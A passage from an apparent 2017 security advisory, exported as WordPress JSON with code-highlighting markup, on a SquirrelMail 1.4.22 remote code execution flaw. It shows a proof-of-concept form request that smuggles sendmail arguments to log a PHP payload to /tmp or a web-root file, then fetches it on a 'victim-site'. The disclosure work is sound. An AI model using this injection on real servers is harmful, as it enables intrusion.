class=\"crayon-e\">Squirrel <\/span><span class=\"crayon-v\">PoC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-42\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-43\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;mailprio&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-45\"><span class=\"crayon-cn\">3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-46\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-47\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;body&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-48\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-49\"><span class=\"crayon-e\">Squirrel<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Hack<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-51\"><span class=\"crayon-ta\">&lt;?php<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">phpinfo<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-ta\">?&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-52\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-53\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;send&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-54\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-55\"><span class=\"crayon-v\">Send<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-56\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-57\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;MAX_FILE_SIZE&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-58\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-59\"><span class=\"crayon-cn\">2097152<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-60\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-61\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;attachfile&#8221;<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-62\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">octet<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">stream<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-63\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-64\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-65\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-66\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;username&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-67\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-68\"><span class=\"crayon-v\">hacker<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-69\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-70\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-71\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;smaction&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-72\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-73\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-74\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-75\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;mailbox&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-76\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-77\"><span class=\"crayon-v\">INBOX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-78\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-79\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;composesession&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-80\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-81\"><span class=\"crayon-cn\">4<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-82\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-83\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;querystring&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-84\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-85\"><span class=\"crayon-v\">mailbox<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">amp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">startMessage<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-86\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0232 seconds] -->  <\/p>\n<p>The request should run the following <em>sendmail<\/em> command process:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58ffcba740c0a617485554\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> www-data 20800  0.0  1.2  83392  6252 ?        S    11:37   0:00 \/usr\/sbin\/sendmail -i -t -froot -X\/tmp\/sqhack -oQ\/tmp null@trusty<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c0a617485554-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c0a617485554-1\"><span class=\"crayon-v\">www<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20800<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0.0<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">1.2<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">83392<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">6252<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">S<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">11<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">37<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sbin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sendmail<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">froot<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sqhack<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">oQ<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">tmp <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">trusty<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p>After the command has completed the log with the payload can be found in <em>\/tmp\/sqhack<\/em>.<\/p>\n<p>If file permissions have been incorrectly set within squirrelmail web document root or any other web application installed on the target server, the attacker could write the payload to a file like <em>\/var\/www\/sqhack.php<\/em> and retrieve it by:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58ffcba740c0e886160924\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/victim-site\/sqhack.php<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c0e886160924-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c0e886160924-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/victim-site\/sqhack.php<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3178\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Tue, 25 Apr 2017 05:24:06 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes Remote Code Execution found in SquirrelMail version 1.4.22. SquirrelMail is a standards-based webmail package written in PHP. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3178\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 SquirrelMail Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757],"class_list":["post-7446","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7446","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7446"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7446\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7446"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.